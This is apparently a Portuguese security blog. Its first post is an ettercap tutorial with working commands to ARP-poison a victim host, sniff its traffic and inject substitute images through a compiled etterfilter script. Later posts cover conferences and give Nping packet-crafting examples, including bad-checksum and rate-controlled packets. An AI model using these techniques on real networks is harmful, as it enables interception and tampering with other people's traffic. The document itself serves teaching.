Brincando com o ettercap

Eu precisei montar um mini curso de TCP/IP para um grupo de técnicos e como comentava de manipulação de pacotes resolvi passar o ettercap pra galera e mostrar como capturar e/ou modificar pacotes de acordo com o tipo de "brincadeira que queremos fazer com a "vítima". Aqui vai algumas coisas legais que podemos fazer com o ettercap.

Monitorando o tráfego da vítima: (arpspoof)

Não vou me atentar aqui a explicar o que é um arpspoff e/ou arp poison essas informações podem ser encontradas no link a seguir:
http://en.wikipedia.org/wiki/ARP_spoofing

Vamos tentar sniffar o tráfego de uma estação da rede local para saber o que a "vítima esta acessando" através do gateway.



Para isso usaremos o ettercap na maquina do atacante:

No ettercap usaremos as seguintes opções:

-T ==> Para executar o ettercap em modo texto
-q ==> Para não ficar printando os pacotes capturados na tela
-p ==> Para a interface "NÃO" entrar em modo promíscuo
-M arp:remote ==> Para executar o arp poison somente entre o gateway e a vítima

Deixando o comando assim:
# ettercap -T -q -p -M ARP:remote // /10.1.1.2/

Assim todo o tráfego da estação da "vítima" estara passando pela sua estação antes de ir para o gateway, assim você pode sniffar o tráfego da vítima usando o tcpdump ou wireshark.

Agora vamos incrementar a brincadeira... :p
Vamos criar um script para que quando a vítma acesse o site com figura X seja exibida a figura Y no lugar da figura X. para isso vamos achar um site que queremos alterar para a vítima (Exemplo www.origsite.com) depois vamos definir a figura que queremos alterar. (Ex.: www.origsite.com/images/logo.png) Agora definimos a figura que queremos que apareça no lugar da figura "logo.png". (Ex.: www.fakesite.org/0wn3d.jpeg) Agora vamos criar o filtro para o ettercap.

Crie um arquivo com o seguinte conteúdo:
---

if (ip.proto == TCP && tcp.src == 80) {
replace(img src=\"http://origsite.com/images/logo.png\"", "img src=\"http://fakesite.org/0wn3d.jpeg\"");
replace(img src=\"http://origsite.com/images/logo.png\"", "img src=\"http://fakesite.org/0wn3d.jpeg\"");

msg("Imagem Alterada. \n");
}

--
Salve o arquivo (Ex.: fake-site.filter) e compile com o seguinte comando:

# etterfilter fake-site.filter -o fake-site.ef

Se não houver nenhum erro de compilação, será criado o arquivo "fake-site.ef", para utiliza-lo basta executar o mesmo comando ettercap anterior adicionando apenas a opção -F e o nome do arquivo "fake-site.ef" como a seguir:

# ettercap -T -q -p -F fake-site.ef -M ARP:remote // /10.1.1.2/

Pronto agora toda vez que o usuário da maquina 10.1.1.2 acessar o site www.origsite.com o logo exibido será o do site www.fakesite.org.

Com um entendimento de como funciona os filtros ettercap podemos fazer muitas coisas divertidas como por exemplo alterar o conteúdo de uma msg do msn, header da requisição http ou até mesmo o site de destino que o cara esta acessando, basta usar a criatividade... =p

Obs.: Todos os sites citados neste artigo são fictícios e o autor não se responsabiliza por qualquer dano que possa ser causado por executar os omandos contidos no texto supra-citado.

Happy Hacking..
By CleBeer

Campus Party Brasil [desorganização total]

Após receber um email convidando a comunidade snort para participar da Campus Party Brasil eu propus uma palestra sobre o snort para divulga a comunidade e mostrar um pouco do que o snort pode fazer para ajudar a mitigar ataques a rede.

Bem estava tudo muito lindo até a fatídica terça-feira dia 26 de janeiro de 2010 quando cheguei a CPbr pra retirar a minha credencial, após pagar vinte reais no estacionamento (não, palestrante não tem direito a estacionamento mas até ae tudo bem) me encaminhei até ao balcão designado para retirada de credenciais "VIP" que de VIP não tinham nada, esperei 40 minutos (e só havia 2 pessoas na minha frente) até chegar minha vez e a senhorita me informar que sic.: "A sua credencial ainda não esta pronta, toma essa fitinha pra ter acesso a CP e volta daqui 3 horas."

Até ai tudo bem eu até que sou um cara calmo, depois vi que minha palestra não estava mais na grade, tudo bem eu já havia recebido um email me orientando a ficar de olho na grade pois a mesma poderia sofrer alterações sem aviso prévio, então mandei um email para o organizador que me convidou para a CPbr e não obtive resposta. Por fim acabei não palestrando.

Mas OK não quero fazer do blog um lugar para desabafo, isso eu faço no bar e quem aguenta é o garçom..rsrs

Como muitos me perguntaram da palestra estou disponibilizando os slides para download.

Download via slideshare AQUI

By CleBeeR

HCF é recebida no Palácio do Planalto

No dia 9 de dezembro o Anderson Ramos esteve em Brasília para conversar com o Sr. Raphael Mandarino Junior, Diretor do DSIC (Departamento de Segurança da Informação e Comunicações). Na pauta, entre outros assuntos, o projeto HCF – Hackers Construindo Futuros.

O DSIC faz parte do GSI (Gabinete de Segurança Institucional), que por sua vez é um órgão essencial da Presidência da República. À frente dele encontra-se o Gen. Jorge Armando Felix, que possui status de Ministro e se reporta diretamente ao Presidente da República. Participaram ainda da reunião o Sr. Macarino Bento Garcia de Freitas, Coordenador-Geral de Segurança e Credenciamento e a Dra. Claudia Canongia, Assessora Técnica do DSIC.

Mais em:

http://www.hcfbr.org/?p=46

By CleBeeR

OWASP AppSec Brasil 2009

CHAMADA PARA PARTICIPAÇÃO

Conferência Internacional de Segurança de Aplicações, organizada e promovida pela comunidade TI-controle e pelo Centro de Informática da Câmara dos Deputados, em parceria com o OWASP, Capítulo Brasil, e com apoio da Universidade de Brasília (UnB)

O Centro de Informática da Câmara dos Deputados e a Comunidade TI-Controle convidam a todos a participarem da Conferência Internacional de Segurança de Aplicações (AppSec Brasil 2009), que ocorrerá na Câmara dos Deputados (Brasília, DF) de 27 a 30 de outubro de 2009.

Haverão mini-cursos nos dias 27 e 28 de outubro, seguidos de sessões plenárias de trilha única nos dias 29 e 30 de outubro de 2009.

Keynotes

Dr. Gary McGraw, CTO da Cigital
O Modelo de Maturidade Building Security In (BSIMM)

Jason Li, Aspect Security
Ágil e Seguro: É possível fazer os dois?

Dinis Cruz, OWASP Board
Apresentação do Projeto OWASP

Kuai Hinojosa, NY University e OWASP
Implementando Aplicações Web Seguras Usando Recursos do OWASP

Palestras

A Conferência contará com palestras técnicas que tratarão diversos aspectos de Segurança de Aplicações. Os temas incluem:

• Segurança de aplicações web
• Otimização de gastos com segurança
• SQL Ownage
• ferramentas.
  

Mini-cursos

A Conferência contará também com 5 mini-cursos:

• Gestão de Riscos de Segurança Aplicada a Web Services
• Segurança Web: Técnicas para Programação Segura de Aplicações
• Segurança Computacional no Desenvolvimento de Web Services
• Tecnologias de Segurança em Web Services
• Hands on Web Application Testing using the OWASP Testing Guide.
  

Local

A Conferência ocorrerá na Câmara dos Deputados, em Brasília. As plenárias serão no auditório Nereu Ramos, no Anexo II e os mini-cursos serão no Centro de Formação, Treinamento e Aperfeiçoamento.

Inscrições

A participação na Conferência será gratuita, mas, devido à limitação de lugares, será necessário inscrever-se previamente.

As inscrições estarão abertas a partir do dia 29/10/2009 na URL: http://www.camara.gov.br/appsecbrasil2009

Informações

Para maiores informações, favor consultar os sites abaixo ou enviar email para appsec.brasil@camara.gov.br

Inscrições e informações sobre a conferência: http://www.camara.gov.br/appsecbrasil2009
Comunidade TI-Controle: http://www.ticontrole.gov.br
Câmara dos Deputados: http://www.camara.gov.br

Hackers To Hackers Conference (H2HC)

Hackers To Hackers Conference (H2HC) é uma conferência organizada por pessoas que trabalham ou que estão diretamente envolvidas com pesquisas e desenvolvimento na área de segurança da informação, cujo principal objetivo é permitir a disseminação, discussão e a troca de conhecimento sobre segurança da informação entre os participantes e também entre as empresas envolvidas no evento. Com treinamentos e palestras apresentadas por membros respeitados do mundo corporativo, grupos de pesquisas e comunidade underground, neste ano a conferência promete demonstrar técnicas que nunca foram vistas ou discutidas com o público anteriormente.

E por que realizar uma conferência onde podem ser demonstradas novas técnicas de ataque, novas ferramentas e pontos de inseguranças de sistemas? Porque queremos mostrar esse tipo de informação para o público, principalmente para pessoas cujo trabalho é proteger e aumentar a segurança dos sistemas e fazer com que eles entendam melhor como os outros atacam os seus computadores. As pessoas que atacam normalmente conhecem diversas técnicas e é importante que analistas de segurança, auditores de sistemas entre outras pessoas responsáveis pela segurança também saibam como se defender.

Como pode ser percebido ao acessar os melhores fóruns, sites e listas de e-mail sobre o assunto, encontrar falhas de segurança não é uma tarefa muito difícil. Para cada falha descoberta por um pesquisador e enviada a um fabricante, provavelmente existem outras que já são conhecidas por pesquisadores que não notificam o fabricante. E nós acreditamos que a melhor maneira para se proteger contra essas falhas desconhecidas é entender profundamente como os problemas acontecem e criar mecanismos de segurança para impedir uma classe de falhas, e não apenas aplicar as correções publicadas pelo fabricante e esperar que ninguém ataque seu sistema com 0day.

Não deixem de participar.

Participação na Ekoparty

Bem, depois de um bom tempo estou de volta. =D

Estive participando na ultima semana da ekoparty ( www.ekoparty.com.ar), uma conferencia argentina sobre segurança da informação. A conferencia contou com quase 500 participantes e é bem parecida com a nossa H2HC (www.h2hc.org.br) que a propósito acontecerá nos dias 28 e 29 de novembro deste ano. Mas voltando a ekoparty a conferencia este ano contou com palestras com um ótimo nível de qualidade. Dentre elas podemos destacar as seguintes:

- Pedram Amini - Mostrame la guita! Adventures in buying vulnerabilities.

Que comentou sobre como é o mercado de compra e venda de vulnerabilidades, na talk o Pedram comentou que existem pessoas no Brasil que vendem vulnerabilidades mas não consegui falar com ele para saber quem são esses caras. =p


- Deviant Ollam - Ten Things Everyone Should Know About Lockpicking & Physical Security

Essa foi uma das palestras que mais me chamou a atenção, além de mostrar diversos tipos diferentes de cadeados/fechaduras o Deviant nos mostrou como abri-las, a conferencia também contou com um stand de lockpicking onde você podia comprar um kit de lockpicking com 7 ferramentas por 100 pesos argentinos (mais ou menos 50 Reais)


- Alfredo Ortega/Anibal Sacco - Deactivate The Rootkit

Essa palestra foi muito interessante pois eles demonstraram como implantar alguns rootkits na BIOS das maquinas e teve demonstração tanto em maquinas virtuais quanto em maquinas reais.

- Moxie Marlinspike - More Tricks For Defeating SSL In Practice

Essa foi com certeza a palestra mais esperada, o Moxie demonstrou como a criação de um certificado ssl junto a uma entidade certificadora é falho e como podemos enganar os usuários que utilizam ssl utilizando a ferramenta sslstrip.

Bem além do alto nível de palestrantes a conferencia contou com uma presença forte da comunidade brasileira de Security, apesar de infelizmente não termos nenhum palestrante brasileiro este ano.

By CleBeeR

Testando o Nping

Hoje comecei a testar o nping a nova ferramenta do Nmap (insecure.org) para gerar pacotes. O Nping é inspirado no famoso hping uma ferramenta que permite que você consiga gerar diversos tipos de pacote através de vários protocolos permitindo que o usuário altere diversos campos do cabeçalho do pacote, já o Nping pode ser utilizado como uma simples ferramenta de ping para testar hosts ativos e também como um gerador de pacotes para testes de IDS, ARP poisoning, ataques DoS, traçar rotas, etc...
Como o Nping ainda é beta vamos baixa-lo via svn. Caso você não possua o comando svn você deve intalar o subversion (http://subversion.tigris.org/)

Baixando o Nping

svn co --username guest --password "" svn://svn.insecure.org/nmap-exp/luis/nping

após terminar o download basta um "cd nping" e executar o famoso:

./configure && make && make install


Pronto com o Nping instalado você ja pode utilizar o "man nping" =p
Segue alguns exemplos de utilização do Nping:

----------
/* Fazer conexão TCP em um host*/
nping --tcp-connect google.com

/* Fazer conexão TCP em varios hosts */
nping --tcp-connect google.com ask.com yahoo.com bing.com

/* Enviar um pacote UDP com 100 bytes de dados randômicos */
nping --udp google.com -p 53 --data-length 100

/* Tenta conectar em um range de portas TCP*/
nping --tcp-connect google.com -p75-85 -c 1

---/* opções que precisam de direitos de root*/

/* Envia pacote UDP com checksum falso e porta de origem 1337 */
sudo nping --udp --badsum --source-port 1337 -p 53 google.com -v6

/*Envia requisição ARP para o IP 192.168.1.1*/
sudo nping --arp 192.168.1.1

/*Envia 300 pacotes TCP a uma taxa de 100pct/seg*/
sudo nping --tcp google.com --rate 100 -c 300

/*Envia pacotes ICMP com os campos ID e Seq customizados*/
sudo nping google.com --icmp --icmp-type echo --icmp-id 31337 --icmp-seq 1

/* Envia um ICMP echo reply*/
sudo nping google.com --icmp --icmp-type echo-reply

----------


Bem.. Agora e só brincar

By CleBeer.... |_b